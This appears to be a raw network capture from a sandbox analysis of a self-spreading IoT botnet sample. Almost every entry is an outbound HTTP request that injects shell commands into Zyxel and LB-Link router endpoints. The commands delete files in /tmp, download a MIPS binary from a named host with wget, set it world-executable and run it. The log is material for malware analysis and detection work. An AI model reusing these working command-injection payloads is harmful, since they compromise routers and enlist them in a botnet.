                                          Jan 14, 2024 15:46:20.083585978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5335192.168.2.2359746110.12.85.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083614111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5336192.168.2.233486859.246.15.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083648920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5337192.168.2.23597305.122.145.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083683014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5338192.168.2.2351912188.176.157.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083717108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5339192.168.2.2359110108.112.79.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083748102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5340192.168.2.234971651.187.60.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083770037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5341192.168.2.2354848110.209.48.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083820105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5342192.168.2.2341102150.54.85.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083842993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5343192.168.2.2352176166.18.53.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083872080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5344192.168.2.2359962152.115.70.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083940029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5345192.168.2.2345596111.37.112.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083988905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5346192.168.2.2340158129.18.114.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084050894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5347192.168.2.2344766174.52.124.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084069014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5348192.168.2.233702862.235.176.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084110975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5349192.168.2.2344494171.5.221.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084146976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5350192.168.2.23537708.77.194.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084170103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5351192.168.2.2358278192.100.88.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084203959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5352192.168.2.235220460.203.37.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084227085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5353192.168.2.2344270145.74.117.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084284067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5354192.168.2.2356424164.82.16.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084309101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5355192.168.2.234659461.70.73.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084331989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5356192.168.2.235286640.237.166.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084394932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5357192.168.2.2346638115.114.242.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084434032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5358192.168.2.234920668.146.86.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084481001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5359192.168.2.2358282144.71.148.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084501982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5360192.168.2.234375262.197.240.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084527969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5361192.168.2.233794298.168.252.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084583998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5362192.168.2.2340224183.231.98.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084619045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5363192.168.2.234451285.213.20.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084656000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5364192.168.2.2334342205.202.32.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084708929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5365192.168.2.2347188112.130.157.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084760904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5366192.168.2.2357276171.71.21.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084780931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5367192.168.2.233704284.179.68.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084827900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5368192.168.2.2343990116.189.146.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084858894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5369192.168.2.2349694203.45.74.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084928989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5370192.168.2.233375018.127.141.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084937096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5371192.168.2.2357064132.213.100.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.084952116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5372192.168.2.2336922188.117.186.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.085014105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5373192.168.2.2348610130.143.158.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.085042953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5374192.168.2.2356520139.209.33.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.085091114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5375192.168.2.2341316221.95.198.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.085124016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5376192.168.2.2335012104.24.166.28080
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.046467066 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                          Jan 14, 2024 15:46:21.141635895 CET328INHTTP/1.1 400 Bad Request
                                          Server: cloudflare
                                          Date: Sun, 14 Jan 2024 14:46:21 GMT
                                          Content-Type: text/html
                                          Content-Length: 155
                                          Connection: close
                                          CF-RAY: -
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5377192.168.2.2341566109.233.2.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095321894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5378192.168.2.236040296.140.90.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095343113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5379192.168.2.2349072122.185.250.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095377922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5380192.168.2.233677453.182.218.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095387936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5381192.168.2.2346908146.5.159.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095419884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5382192.168.2.234927450.10.17.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095439911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5383192.168.2.235668085.195.148.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095474958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5384192.168.2.235235486.229.84.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095500946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5385192.168.2.234743039.26.223.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095539093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5386192.168.2.234863062.111.161.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095551968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5387192.168.2.2360104151.180.44.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095566988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5388192.168.2.2348648167.92.71.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095597029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5389192.168.2.2348128110.211.32.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095633984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5390192.168.2.2347370187.227.31.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095638037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5391192.168.2.2335494221.178.206.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095679045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5392192.168.2.2352644136.205.186.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095695019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5393192.168.2.2347730198.57.118.62443
                                          TimestampBytes transferredDirectionData
